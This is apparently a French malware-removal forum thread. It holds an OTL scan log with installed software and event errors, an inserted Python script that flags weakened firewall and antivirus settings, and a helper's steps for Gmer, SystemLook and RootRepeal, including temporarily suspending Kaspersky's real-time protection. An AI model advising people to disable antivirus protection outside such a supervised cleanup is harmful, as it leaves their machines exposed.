"{770657D0-A123-3C07-8E44-1C83EC895118}" = Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053
"{770F1BEC-2871-4E70-B837-FB8525FFA3B1}" = Windows Live Messenger
"{7A900EAB-DA37-4554-AF19-9C337476D05D}" =
"{802771A9-A856-4A41-ACF7-1450E523C923}" = Adobe XMP Panels CS3
"{821DC151-4691-4E26-AE7E-522921D0FD54}" = RemoteCapture Task
"{82C7B308-0BDD-49D8-8EA5-9CD3A3F9DF41}" = Windows Live Call
"{844DA731-B8B0-4581-AF3C-5158CC16897E}" = BlackBerry v4.2.2 pour terminal mobile sans fil série 8320
"{869D88A5-BD6C-4E39-8536-D95259EAD7E8}" =
"{881A74B3-3D17-4842-B9AF-0761C6E6C4B5}" =
"{8850DEC8-22FD-4F05-A3AA-49B91200C24F}" = ShadowProtect Desktop
"{8A25392D-C5D2-4E79-A2BD-C15DDC5B0959}" = Bonjour
"{8D2BA474-F406-4710-9AE4-D4F22D21F0DD}" = Adobe Device Central CS3
"{8DC42D05-680B-41B0-8878-6C14D24602DB}" = QuickTime
"{8E6808E2-613D-4FCD-81A2-6C8FA8E03312}" = Adobe Type Support
"{9011040C-6000-11D3-8CFE-0150048383C9}" = Microsoft Office Professional Edition 2003
"{90120000-0020-040C-0000-0000000FF1CE}" = Module de compatibilité pour Microsoft Office System 2007
"{90176341-0A8B-4CCC-A78D-F862228A6B95}" = Adobe Anchor Service CS3
"{9249D7E7-33E7-4CC8-BB0B-3DF3C3CB2568}" = Nokia PC Suite
"{95120000-00B9-0409-0000-0000000FF1CE}" = Microsoft Application Error Reporting
"{9786C836-15BB-4D5A-8317-36EBBA691AD8}_is1" = ZNsoft Icon Maker
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9A394342-4A68-4EBA-85A6-55B559F4E700}" = Microsoft .NET Framework 1.1 French Language Pack
"{9C9824D9-9000-4373-A6A5-D0E5D4831394}" = Adobe Bridge CS3
"{A1F66FC9-11EE-4F2F-98C9-16F8D1E69FB7}" = Segoe UI
"{A28F43DA-258F-42EC-9C95-E6C9A7475670}" = hppIOFiles
"{A2B242BD-FF8D-4840-9DAA-9170EABEC59C}" = Adobe CMaps
"{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}" = Microsoft .NET Framework 3.0 Service Pack 2
"{AC5B0C19-D851-42F4-BDA0-410ECF7F70A5}" = PDF Settings
"{AC76BA86-1033-0000-7760-000000000001}" = Adobe Acrobat 6.0 Professional
"{AC76BA86-7AD7-1033-7B44-A70000000000}" = Adobe Reader 7.0
"{AF111648-99A1-453E-81DD-80DBBF6DAD0D}" = MSVC90_x86
"{B131E59D-202C-43C6-84C9-68F0C37541F1}" = Galerie de photos Windows Live
"{B3BF6689-A81D-40D8-9A86-4AC4ACD9FC1C}" = Adobe Camera Raw 4.0
"{B5BAAFAE-3561-463D-8E3F-91761A57ADB8}" =
"{B7030B17-4177-4FA8-A99D-8AD8867A9234}" = MP4 Transcoder
"{B9B35331-B7E4-4E5C-BF4C-7BC87856124D}" = Adobe Default Language CS3
"{B9B9863A-32FD-4133-ADB7-46244ED77694}" = Camera Support Core Library
"{BEF56F2D-56ED-4176-BF72-7B68D4A3B98D}" = Canon PhotoRecord
"{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}" = Microsoft .NET Framework 2.0 Service Pack 2
"{C1D76D7A-F3BB-47EA-A746-5B1E2FFC1DF2}" = Canon Utilities ZoomBrowser EX
"{C2D69781-F392-4118-A5A7-C7E9C38DBFC2}" = Adobe ExtendScript Toolkit 2
"{C43048A9-742C-4DAD-90D2-E3B53C9DB825}" = Logiciel QuickCam de Logitech
"{C50EF365-2898-489A-B6C7-30DAA466E9A2}" = Nokia Connectivity Cable Driver
"{C6866B7D-ACFD-4C49-B77B-3B2F8CF54B96}" =
"{CA0A1E54-CE0F-4366-B09C-A87B61DC5633}" =
"{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}" = Microsoft .NET Framework 1.1
"{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1
"{CE67DBBB-2ED0-4F35-B482-0CFE4CFC1570}" = Adobe Setup
"{D0DFF92A-492E-4C40-B862-A74A173C25C5}" = Adobe Version Cue CS3 Client
"{D2559B88-CC9D-4B48-81BB-F492BAA9C48C}" = Adobe PDF Library Files
"{D3116CC7-24DC-4CA3-9CE1-23FED836E9F2}" = Assistant de connexion Windows Live
"{D48C9BFC-FBCF-4F29-B97D-822ED6D497FE}" = PC Studio for SGH-Z500V
"{DADD7B8A-BCB0-44F5-967A-ECB6B4F2ECD9}" = Adobe Color Common Settings
"{DD7DB3C5-6FA3-4FA3-8A71-C2F2940EB029}" = Adobe Color JA Extra Settings
"{DE286975-ACF1-45B8-9EF7-34E162B2C817}" = MovieEdit Task
"{DFE60A2D-6191-4760-A7C5-E229C8D71978}" = BlackBerry Desktop Software 4.6
"{E69AE897-9E0B-485C-8552-7841F48D42D8}" = Adobe Update Manager CS3
"{E8D7DC60-44F9-4523-B56E-88860B7E3028}" = Shuttle Wireless LAN
"{EA6C1A80-D188-427C-8102-226CF9E35AF4}" = Symbian Developer Certificate Request
"{EC4455AB-F155-4CC1-A4C5-88F3777F9886}" = Apple Mobile Device Support
"{ED00D08A-3C5F-488D-93A0-A04F21F23956}" = Windows Live Communications Platform
"{EF4C7EB0-D71B-43A3-9552-8053DE4B0401}" = PhotoStitch
"{EFCE5837-FC21-11D6-9D24-00010240CE95}" = Java 2 Runtime Environment, SE v1.4.1_02
"{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}" = Microsoft SQL Server 2005 Compact Edition [ENU]
"{F0E12BBA-AD66-4022-A453-A1C8A0C4D570}" = Microsoft Choice Guard
"{F29B21BD-CAA6-445F-8EF7-A7E2B9D8B14E}" = Logitech SetPoint
"{F333A33D-125C-32A2-8DCE-5C5D14231E27}" = Visual C++ 2008 x86 Runtime - (v9.0.30729)
"{F333A33D-125C-32A2-8DCE-5C5D14231E27}.vc_x86runtime_30729_01" = Visual C++ 2008 x86 Runtime - v9.0.30729.01
"{F37942A8-B21B-4C5A-A1D2-B676BF55EAE0}" = Camera Window
"{F6377647-81AF-41C0-BC7E-06CF37E204AB}" = Roxio Media Manager
"{FB08F381-6533-4108-B7DD-039E11FBC27E}" = Realtek AC'97 Audio
"{FF29A7E2-FF40-4D07-B7E4-2093DE59E10A}" = Adobe Color NA Extra Settings
"05B59228C7E1C21DFBE89260F879BD95880548D8" = Package de pilotes Windows - Nokia Modem (10/05/2009 4.2)
"0C5EDC3653FED5B121F464339EAC12534D253B25" = Package de pilotes Windows - Nokia Modem (02/15/2007 3.1)
"504244733D18C8F63FF584AEB290E3904E791693" = Package de pilotes Windows - Nokia pccsmcfd (08/22/2008 7.0.0.0)
"6A630DCEC5EEC912115F2FF59D8C2C769798D930" = Package de pilotes Windows - Nokia Modem (10/12/2007 3.6)
"819D45A9F73817F5B6D7C71A33ADAB88C5DA1765" = Package de pilotes Windows - Nokia Modem (08/03/2007 6.84.0.2)
"8CDCFB95BB84DD9C0F88F22266A0CA86035E55BA" = Package de pilotes Windows - Nokia Modem (06/01/2009 7.01.0.4)
"9CD348AE9C64C4B939B624E8E24F3903EFDFC82B" = Package de pilotes Windows - Nokia Modem (05/22/2008 7.00.0.1)
"ACDSee 32" = ACDSee 32
"AddressBook" =
"Adobe Flash Player ActiveX" = Adobe Flash Player 10 ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 10 Plugin
"Adobe PageMaker 7.0" = Adobe PageMaker 7.0
"Adobe Photoshop 5.5 Tryout" = Adobe Photoshop 5.5 Tryout
"Adobe Shockwave Player" = Adobe Shockwave Player 11.5
"Adobe SVG Viewer" = Adobe SVG Viewer 3.0
"Adobe_e21d2df5563f0bf421cf2cc5ec26c42" = Adobe Illustrator CS3
"Audacity_is1" = Audacity 1.2.6
"B726756F5B5A5AA9D798B399386FC6205A45F19E" = Package de pilotes Windows - Nokia Modem (02/15/2007 3.1)
"BlackBerry_{DFE60A2D-6191-4760-A7C5-E229C8D71978}" = BlackBerry Desktop Software 4.6
"Branding" =
"C5A76DC11BABDA0A881E7BE8DDEB641365A77FFD" = Package de pilotes Windows - Nokia Modem (05/22/2008 3.8)
"CBF192A85B624E32B8D19ADEEF2DCFC5BC3AA73A" = Package de pilotes Windows - Nokia Modem (03/05/2008 3.7)
"CD8424B9400BFF7D34AA18F816C71322AC4BDAA7" = Package de pilotes Windows - Nokia Modem (05/24/2007 6.84.0.1)
"Connection Manager" =
"Declan's French FlashCards_is1" = Declan's French FlashCards v1.4
"Declan's Korean Dictionary_is1" = Declan's Korean Dictionary v1.1
"Declan's Korean FlashCards_is1" = Declan's Korean FlashCards v2.1
"Declan's Spanish FlashCards_is1" = Declan's Spanish FlashCards v1.6
"DirectAnimation" =
"DirectDrawEx" =
"DXM_Runtime" =
"E092B2EBF2FFE83E896F8F7F829A7B5D7D1B2F9D" = Package de pilotes Windows - Nokia Modem (03/13/2008 6.86.0.1)
"ERUNT_is1" = ERUNT 1.1j
"F1CB0AC2D40DDCFCA6933082B115073476C155DE" = Package de pilotes Windows - Nokia Modem (08/03/2007 3.2)
"Fontcore" =
"Home'Bank Light_is1" = Home'Bank Light 3.3.3
"ICW" =
"IDNMitigationAPIs" = Microsoft Internationalized Domain Names Mitigation APIs
"IE40" =
"IE4Data" =
"IE5BAKEX" =
"ie7" = Windows Internet Explorer 7
"ie8" = Windows Internet Explorer 8
"IEData" =
"InstallShield Uninstall Information" =
"InstallShield_{16976C6C-F8D5-4317-9DE8-1F6352B66725}" = Canon RAW Image Task for ZoomBrowser EX
"InstallShield_{2F81FBFC-9A37-431F-9050-14B55485DF5A}" = Canon Internet Library for ZoomBrowser EX
"InstallShield_{821DC151-4691-4E26-AE7E-522921D0FD54}" = Canon RemoteCapture Task for ZoomBrowser EX
"InstallShield_{B9B9863A-32FD-4133-ADB7-46244ED77694}" = Canon Camera Support Core Library
"InstallShield_{D48C9BFC-FBCF-4F29-B97D-822ED6D497FE}" = PC Studio
"InstallShield_{DE286975-ACF1-45B8-9EF7-34E162B2C817}" = Canon MovieEdit Task for ZoomBrowser EX
"InstallShield_{EF4C7EB0-D71B-43A3-9552-8053DE4B0401}" = Canon Utilities PhotoStitch 3.1
"InstallShield_{F37942A8-B21B-4C5A-A1D2-B676BF55EAE0}" = Canon Camera Window for ZoomBrowser EX
"InstallWIX_{1A59064A-12A9-469F-99F6-04BF118DBCFF}" = Kaspersky PURE
"Korean HakGyo_is1" = Korean HakGyo version 2.1
"Malwarebytes' Anti-Malware_is1" = Malwarebytes' Anti-Malware
"Media Player" = Media Player
"Microsoft .NET Framework 1.1 (1033)" = Microsoft .NET Framework 1.1
"Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1
"Microsoft NetShow Player 2.0" =
"MobileOptionPack" =
"Mozilla Firefox (3.6.16)" = Mozilla Firefox (3.6.16)
"MSCompPackV1" = Microsoft Compression Client Pack 1.0 for Windows XP
"MSI30a-KB884016" =
"MSI30-Beta1" =
"MSI30-Beta2" =
"MSI30-KB884016" =
"MSI30-RC1" =
"MSI30-RC2" =
"MSI31-Beta" =
"MSI31-RC1" =
"MsJavaVM" =
"Nero - Burning Rom!UninstallKey" =
"NeroMultiInstaller!UninstallKey" = Nero Suite
"NeroVision!UninstallKey" = NeroVision Express 2
"NetMeeting" =
"NLSDownlevelMapping" = Microsoft National Language Support Downlevel APIs
"NMPUninstallKey" =
"Nokia Multimedia Factory{4CFB3821-1582-4F3B-BF8D-30986923B36B}" = Nokia Multimedia Factory
"Nokia PC Suite" = Nokia PC Suite
"Notepad++" = Notepad++
"OutlookExpress" =
"PCHealth" =
"PhotoRecord" =
"Picasa 3" = Picasa 3
"QcDrv" = Programme de gestion Camera de Logitech®
"ReadWrite Korean_is1" = ReadWrite Korean version 2.1
"SchedulingAgent" =
"Sevinst" =
"Shockwave" =
"TMM90JDAME" = PRINCIPIANTE SIN NOCIONES
"ViewpointMediaPlayer" = Viewpoint Media Player (Remove Only)
"Wdf01005" = Microsoft Kernel-Mode Driver Framework Feature Pack 1.5
"Wdf01007" = Microsoft Kernel-Mode Driver Framework Feature Pack 1.7
"WGA" = Windows Genuine Advantage Validation Tool
"WIC" = Windows Imaging Component
"Windows Media Format Runtime" = Windows Media Format 11 runtime
"Windows Media Player" = Lecteur Windows Media 11
"Windows XP Service" = Windows XP Service Pack 3
"WinLiveSuite_Wave3" = Installation Windows Live
"WinRAR archiver" = Archiveur WinRAR
"winscp3_is1" = WinSCP 4.3.2
"WMFDist11" = Windows Media Format 11 runtime
"wmp11" = Windows Media Player 11
"WordFile Creator Pro (Korean)_is1" = WordFile Creator Pro (Korean) 1.2
"Wudf01007" = Microsoft User-Mode Driver Framework Feature Pack 1.7

========== HKEY_USERS Uninstall List ==========

[HKEY_USERS\S-1-5-21-1220945662-746137067-839522115-1003\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"Google Chrome" = Google Chrome

========== Last 10 Event Log Errors ==========

[ Application Events ]
Error - 2/05/2011 3:04:48 | Computer Name = KARIM-PBDRK3C5J | Source = ShadowProtectSvc | ID = 1121
Description = Statut de la sauvegarde: failed Fichier Image: G:\Backup SK Com\Backup
SK Com Fichier Log: C:\Program Files\StorageCraft\ShadowProtect\Logs\{3B3CB415-A325-4D4F-A509-8E8BB20B72DD}.txt
Heure
de départ: 2/05/2011 9:04:46 Module: service Code: 509 Message: Impossible d'accéder
à l'objet ciblé

Error - 3/05/2011 6:23:56 | Computer Name = KARIM-PBDRK3C5J | Source = ShadowProtectSvc | ID = 1121
Description = Statut de la sauvegarde: failed Fichier Image: G:\Backup SK Com\Backup
SK Com Fichier Log: C:\Program Files\StorageCraft\ShadowProtect\Logs\{3B3CB415-A325-4D4F-A509-8E8BB20B72DD}.txt
Heure
de départ: 3/05/2011 12:23:55 Module: service Code: 509 Message: Impossible d'accéder
à l'objet ciblé

Error - 6/05/2011 9:57:52 | Computer Name = KARIM-PBDRK3C5J | Source = ShadowProtectSvc | ID = 1121
Description = Statut de la sauvegarde: failed Fichier Image: G:\Backup SK Com\Backup
SK Com Fichier Log: C:\Program Files\StorageCraft\ShadowProtect\Logs\{3B3CB415-A325-4D4F-A509-8E8BB20B72DD}.txt
Heure
de départ: 6/05/2011 15:57:52 Module: service Code: 509 Message: Impossible d'accéder
à l'objet ciblé

Error - 9/05/2011 3:56:34 | Computer Name = KARIM-PBDRK3C5J | Source = ShadowProtectSvc | ID = 1121
Description = Statut de la sauvegarde: failed Fichier Image: G:\Backup SK Com\Backup
SK Com Fichier Log: C:\Program Files\StorageCraft\ShadowProtect\Logs\{3B3CB415-A325-4D4F-A509-8E8BB20B72DD}.txt
Heure
de départ: 9/05/2011 9:56:32 Module: service Code: 509 Message: Impossible d'accéder
à l'objet ciblé

Error - 9/05/2011 4:30:01 | Computer Name = KARIM-PBDRK3C5J | Source = ShadowProtectSvc | ID = 1121
Description = Statut de la sauvegarde: failed Fichier Image: G:\Backup SK Com\Backup
SK Com Fichier Log: C:\Program Files\StorageCraft\ShadowProtect\Logs\{3B3CB415-A325-4D4F-A509-8E8BB20B72DD}.txt
Heure
de départ: 9/05/2011 10:30:00 Module: service Code: 509 Message: Impossible d'accéder
à l'objet ciblé

Error - 9/05/2011 4:30:01 | Computer Name = KARIM-PBDRK3C5J | Source = ShadowProtectSvc | ID = 1121
Description = Statut de la sauvegarde: failed Fichier Image: G:\Backup SK Com\Backup
SK Com Fichier Log: C:\Program Files\StorageCraft\ShadowProtect\Logs\{3B3CB415-A325-4D4F-A509-8E8BB20B72DD}.txt
Heure
de départ: 9/05/2011 10:30:01 Module: service Code: 509 Message: Impossible d'accéder
à l'objet ciblé

Error - 9/05/2011 13:05:15 | Computer Name = KARIM-PBDRK3C5J | Source = ShadowProtectSvc | ID = 1121
Description = Statut de la sauvegarde: failed Fichier Image: G:\Backup SK Com\Backup
SK Com Fichier Log: C:\Program Files\StorageCraft\ShadowProtect\Logs\{3B3CB415-A325-4D4F-A509-8E8BB20B72DD}.txt
Heure
de départ: 9/05/2011 19:05:14 Module: service Code: 509 Message: Impossible d'accéder
à l'objet ciblé

Error - 11/05/2011 2:39:05 | Computer Name = KARIM-PBDRK3C5J | Source = ShadowProtectSvc | ID = 1121
Description = Statut de la sauvegarde: failed Fichier Image: G:\Backup SK Com\Backup
SK Com Fichier Log: C:\Program Files\StorageCraft\ShadowProtect\Logs\{3B3CB415-A325-4D4F-A509-8E8BB20B72DD}.txt
Heure
de départ: 11/05/2011 8:39:04 Module: service Code: 509 Message: Impossible d'accéder
à l'objet ciblé

Error - 11/05/2011 4:46:37 | Computer Name = KARIM-PBDRK3C5J | Source = crypt32 | ID = 131080
Description = Échec de la récupération de la mise à jour automatique du numéro de
séquence de la liste racine tierce partie à partir de : <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootseq.txt>
avec l'erreur : Cette opération s'est terminée car le délai d'attente a expiré.


Error - 11/05/2011 7:11:18 | Computer Name = KARIM-PBDRK3C5J | Source = ShadowProtectSvc | ID = 1121
Description = Statut de la sauvegarde: failed Fichier Image: G:\Backup SK Com\Backup
SK Com Fichier Log: C:\Program Files\StorageCraft\ShadowProtect\Logs\{3B3CB415-A325-4D4F-A509-8E8BB20B72DD}.txt
Heure
de départ: 11/05/2011 13:11:17 Module: service Code: 509 Message: Impossible d'accéder
à l'objet ciblé

[ System Events ]
Error - 11/05/2011 4:13:44 | Computer Name = KARIM-PBDRK3C5J | Source = DCOM | ID = 10005
Description = DCOM a reçu l'erreur "%1084" lors de la mise en route du service wuauserv
avec les arguments "" pour démarrer le serveur : {E60687F7-01A1-40AA-86AC-DB1CBF673334}

Error - 11/05/2011 4:14:17 | Computer Name = KARIM-PBDRK3C5J | Source = Service Control Manager | ID = 7026
Description = Le pilote de démarrage système ou d'amorçage suivant n'a pas pu se
charger : CSVirtualDiskDrv Fips intelppm kl1 KLIF sbmount SYMTDI

Error - 11/05/2011 4:14:49 | Computer Name = KARIM-PBDRK3C5J | Source = DCOM | ID = 10005
Description = DCOM a reçu l'erreur "%1084" lors de la mise en route du service EventSystem
avec les arguments "" pour démarrer le serveur : {1BE1F766-5536-11D1-B726-00C04FB926AF}

Error - 11/05/2011 4:17:02 | Computer Name = KARIM-PBDRK3C5J | Source = DCOM | ID = 10005
Description = DCOM a reçu l'erreur "%1084" lors de la mise en route du service EventSystem
avec les arguments "" pour démarrer le serveur : {1BE1F766-5536-11D1-B726-00C04FB926AF}

Error - 11/05/2011 4:18:02 | Computer Name = KARIM-PBDRK3C5J | Source = Service Control Manager | ID = 7026
Description = Le pilote de démarrage système ou d'amorçage suivant n'a pas pu se
charger : CSVirtualDiskDrv Fips intelppm kl1 KLIF sbmount SYMTDI

Error - 11/05/2011 7:01:44 | Computer Name = KARIM-PBDRK3C5J | Source = DCOM | ID = 10005
Description = DCOM a reçu l'erreur "%1084" lors de la mise en route du service MSIServer
avec les arguments "" pour démarrer le serveur : {000C101C-0000-0000-C000-000000000046}

Error - 11/05/2011 7:01:50 | Computer Name = KARIM-PBDRK3C5J | Source = DCOM | ID = 10005
Description = DCOM a reçu l'erreur "%1084" lors de la mise en route du service MSIServer
avec les arguments "" pour démarrer le serveur : {000C101C-0000-0000-C000-000000000046}

Error - 11/05/2011 7:08:01 | Computer Name = KARIM-PBDRK3C5J | Source = DCOM | ID = 10005
Description = DCOM a reçu l'erreur "%1084" lors de la mise en route du service CSObjectsSrv
avec les arguments "" pour démarrer le serveur : {D7B356D0-0DA4-11DB-8993-005056C00008}

Error - 11/05/2011 7:08:04 | Computer Name = KARIM-PBDRK3C5J | Source = DCOM | ID = 10005
Description = DCOM a reçu l'erreur "%1084" lors de la mise en route du service EventSystem
avec les arguments "" pour démarrer le serveur : {1BE1F766-5536-11D1-B726-00C04FB926AF}

Error - 11/05/2011 7:10:29 | Computer Name = KARIM-PBDRK3C5J | Source = Service Control Manager | ID = 7009
Description = Délai (30000 millisecondes) d'attente pour une connexion du service
Roxio Hard Drive Watcher 9.


< End of report >
bea23

Posts: 16
Joined: 11 May 2011, 08:49
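
As an added example (not part of this thread, and not OTL's own code), here is a small Python triage script for the "Security Center Settings" and "Firewall Settings" sections of an OTL Extras report such as the one above: it parses the bracketed registry key paths and the "name" = data lines, flags settings that weaken the host (firewall disabled in the standard profile, antivirus notifications silenced, a vendor no longer monitored by Security Center) and lists the programs allowed through the firewall. The log excerpt is constructed to mirror the posted values, and the risk rules are the example's own.

```python
"""Triage the Security Center and Firewall sections of an OTL Extras log.

The format is the one posted in this thread (section banners, registry
key paths in brackets, "name" = data lines); the risk rules below are this
example's own and are not part of OTL.
"""
import re
from typing import Dict, List, Tuple

# Constructed excerpt mirroring the posted report (same keys and values).
SAMPLE_LOG = r"""
========== Security Center Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = 1
"FirewallDisableNotify" = 0
"AntiVirusOverride" = 1
"FirewallOverride" = 0

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\KasperskyAntiVirus]
"DisableMonitoring" = 1

========== Firewall Settings ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 0
"DoNotAllowExceptions" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
"C:\Program Files\eMule\emule.exe" = C:\Program Files\eMule\emule.exe:*:Enabled:eMule
"C:\Program Files\BitTorrent\bittorrent.exe" = C:\Program Files\BitTorrent\bittorrent.exe:*:Enabled:BitTorrent
"""

BANNER_RE = re.compile(r"^=+ .+ =+$")           # ========== Section ==========
KEY_RE = re.compile(r"^\[(.+)\]$")              # [HKEY_...\path]
VALUE_RE = re.compile(r'^"(.+?)" =\s*(.*)$')    # "name" = data (data may be empty)

Registry = Dict[str, Dict[str, str]]


def parse_otl_registry(text: str) -> Registry:
    """Map every registry key path in the log to its {value name: data}."""
    registry: Registry = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or BANNER_RE.match(line):
            continue
        key = KEY_RE.match(line)
        if key:
            current = key.group(1)
            registry.setdefault(current, {})
            continue
        value = VALUE_RE.match(line)
        if value and current is not None:
            registry[current][value.group(1)] = value.group(2)
    return registry


# (key path suffix, value name, data that is a finding, severity, explanation)
RULES: List[Tuple[str, str, str, str, str]] = [
    (r"\Security Center", "AntiVirusDisableNotify", "1", "high",
     "Security Center will not warn when the antivirus is off or out of date"),
    (r"\Security Center", "AntiVirusOverride", "1", "medium",
     "antivirus status alerts are overridden rather than monitored"),
    (r"\Security Center", "FirewallDisableNotify", "1", "high",
     "Security Center will not warn when the firewall is off"),
    (r"\FirewallPolicy\StandardProfile", "EnableFirewall", "0", "high",
     "Windows Firewall is disabled for the standard (non-domain) profile"),
]


def triage(registry: Registry) -> List[Tuple[str, str]]:
    """Return (severity, message) findings for settings that weaken defences."""
    findings: List[Tuple[str, str]] = []
    for key, values in registry.items():
        for suffix, name, bad, severity, why in RULES:
            if key.endswith(suffix) and values.get(name) == bad:
                findings.append((severity, f'"{name}" = {bad}: {why}'))
        # A vendor subkey with DisableMonitoring=1 means Security Center no
        # longer tracks that product itself; confirm the product is running.
        if "\\Security Center\\Monitoring\\" in key and values.get("DisableMonitoring") == "1":
            vendor = key.rsplit("\\", 1)[-1]
            findings.append(("info", f"{vendor}: not monitored by Security Center"))
    return findings


def firewall_exceptions(registry: Registry) -> List[Tuple[str, ...]]:
    """List (path, scope, state, label) for every authorized application.

    OTL prints the raw value data, "<path>:<scope>:<Enabled|Disabled>:<label>";
    the path itself contains a colon (drive letter), so split from the right.
    """
    exceptions: List[Tuple[str, ...]] = []
    for key, values in registry.items():
        if not key.endswith(r"\AuthorizedApplications\List"):
            continue
        for data in values.values():
            parts = data.rsplit(":", 3)
            if len(parts) == 4:
                exceptions.append(tuple(parts))
    return exceptions


if __name__ == "__main__":
    reg = parse_otl_registry(SAMPLE_LOG)
    for severity, message in triage(reg):
        print(f"[{severity}] {message}")
    for path, scope, state, label in firewall_exceptions(reg):
        print(f"[exception] {label}: {path} scope={scope} {state}")
```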

Re: Request for analysis of reports

Post by bea23 » 11 May 2011, 16:10

There, I hope I haven't missed or forgotten anything.
bea23

Posts: 16
Joined: 11 May 2011, 08:49

Re: Request for analysis of reports

Post by nickW » 12 May 2011, 00:48

Good evening,

Further checks:
Important note: these two scans can take ... quite some time.


I advise you to print the procedure, or to select all of its lines and copy that selection into a text file on your PC (Note: you will not have access to the Internet or to the browser during step 4).
All the steps must be carried out, without interruption, in the exact order given below.
If anything seems unclear, ask for an explanation before starting.


Étape 1: SystemLook (de jpshortstuff)
Télécharger SystemLook depuis l'un des deux liens ci-dessous:
http://jpshortstuff.247fixes.com/SystemLook.exe
http://images.malwareremoval.com/jpshor ... emLook.exe
Enregistrer ce fichier sur le Bureau.


Étape 2: Gmer, téléchargement
Télécharger le programme exécutable (fichier .exe) depuis la page http://www.gmer.net/#files
Cliquer sur le bouton Download EXE.
Enregistrer le fichier à la racine du disque système (généralement C: ) en notant son nom (qui est aléatoire).


Étape 3: Pas de processus de contrôle en temps réel
Désactiver le module résident de l'antivirus.
Image Kaspersky: clic droit sur l'icône dans la SysBarre (à coté de l'horloge), puis "Suspension de la protection...", "A la demande de l'utilisateur".


Étape 4: Gmer, exécution

Fermer absolument toutes les applications, les connexions et les navigateurs.

Faire un double clic sur le fichier au nom aléatoire téléchargé précédemment.

Attendre quelques instants le chargement du pilote et les premières recherches.

Si l'outil affiche un message "WARNING !!! GMER has found system modification ... Do You want to fully scan your system ?", cliquer sur NO.

Vérifier que toutes les cases de la colonne de droite sont cochées sauf
Sections
les lecteurs autres que C:\
"Show all"

comme ceci:
Image

puis cliquer sur le bouton Scan.

Attendre sans rien faire d'autre (... c'est un peu long...).
Les clés de Registre & fichiers analysés s'affichent en bas de la fenêtre.

Lorsque l'outil a terminé (il n'y a plus de défilement en bas de la fenêtre), cliquer sur le bouton Save ....

Une fenêtre du Bloc-notes va s'ouvrir, contenant le fichier rapport.
Note: Dans le Bloc-notes, vérifier dans le menu Format que l'option "Retour automatique à la ligne" n'est pas cochée.
Enregistrer ce fichier sur le Bureau sous le nom gmer-110511.txt.
Fermer la fenêtre Gmer (clic sur OK).


Étape 5: SystemLook (de jpshortstuff)
Faire un double clic sur SystemLook.exe pour lancer l'exécution de l'outil.

Sélectionner toutes les lignes ci-dessous comprises entre les deux lignes ------- (qu'il ne faut pas sélectionner), puis appuyer simultanément sur les touches Ctrl et C

-----------------------------------------------------

:comment
:filefind
*cleansweep*
:folderfind
*cleansweep*
:regfind
cleansweep


-----------------------------------------------------


Dans la petite fenêtre de SystemLook, faire un clic droit dans la zone blanche et choisir Coller.
Note: les lignes sélectionnées précédemment doivent avoir été recopiées dans la zone blanche de SystemLook - y compris le caractère "deux points" en début de première ligne.

Cliquer sur le bouton Look pour lancer la recherche.

Lorsque l'outil a terminé cette recherche, il y a ouverture d'une fenêtre du Bloc-notes.
Fermer le Bloc-notes.
Fermer SystemLook en cliquant sur le bouton Exit.


Étape 6: Réactivation des programmes de sécurité résidents
Important: Réactiver le module résident de l'antivirus.


Étape 7: Résultats
Envoyer en réponse:
*- le rapport de Gmer (contenu du fichier gmer-110511.txt)<----ce rapport est parfois très long; vérifier qu'il est complet; si nécessaire le découper en plusieurs messages -- en utilisant toujours le bouton Répondre.
*- le rapport de SystemLook (contenu du fichier SystemLook.txt situé sur le Bureau)


Note importante: Pour l'envoi de ta(tes) réponse(s), il ne faut pas créer un nouveau sujet, mais cliquer sur le bouton "Répondre" Image pour continuer dans ce fil de discussion.

A suivre,
nickW - Image
30/07/2012: Plus de désinfection de PC jusqu'à nouvel ordre.
Pas de demande d'analyse de log en MP (Message Privé)
Mes configs

Re: Request for log analysis

Post by bea23 » 13 May 2011, 14:43

Hello,

I have a problem with the Gmer scan: everything runs normally for several hours. But twice now I have come back hoping to see the end of the scan and the log being written, only to find my PC rebooted and no log saved.

When I restart Windows, it tells me that a system error occurred. Here are the details shown in that error message:
BCCode : f4 BCP1 : 00000003 BCP2 : 86AFE360 BCP3 : 86AFE4D4
BCP4 : 8060577E OSVer : 5_1_2600 SP : 3_0 Product : 256_1

Any idea what is going on?

Re: Request for log analysis

Post by nickW » 14 May 2011, 00:55

Good evening,

1/ Can you run the SystemLook scan and post its result?
(Step 5 above)


2/ Check the voltages and the temperature of the components.

Step 1: HWINFO32 (by REALiX™), download
Open the page http://www.hwinfo.com/
In the blue bar click Download, then in the drop-down list click HWINFO32.
Scroll down to the paragraph Download HWiNFO32 Package, under Please choose the package type and download location:.
Download the Portable ZIP version by clicking the blue Download button
Create a new folder named HWINFO32 and extract all the files of the downloaded archive hw32_nnn.zip (nnn = version number) into it.

Step 2: HWINFO32 (by REALiX™), use
Open the HWINFO32 folder created earlier, then double-click hwinfo32.exe to start the program.
In the small "Welcome" window, click the RUN button.
Two windows open.
In the foreground, a beige window titled "System Summary" that lists the PC's main base system components. Close this window by clicking the Close button at the bottom right.
In the large white window, click the Sensors button (at the top).
A window titled "Sensor Status" opens.
This window is updated continuously.

It lets you check the temperatures and voltages.


3/ Use another tool to look for hidden processes:

Step 1: RootRepeal (by AD), download
Download RootRepeal by right-clicking one of the links below:
http://ad13.geekstogo.com/RootRepeal.zip
http://rootrepeal.googlepages.com/RootRepeal.zip
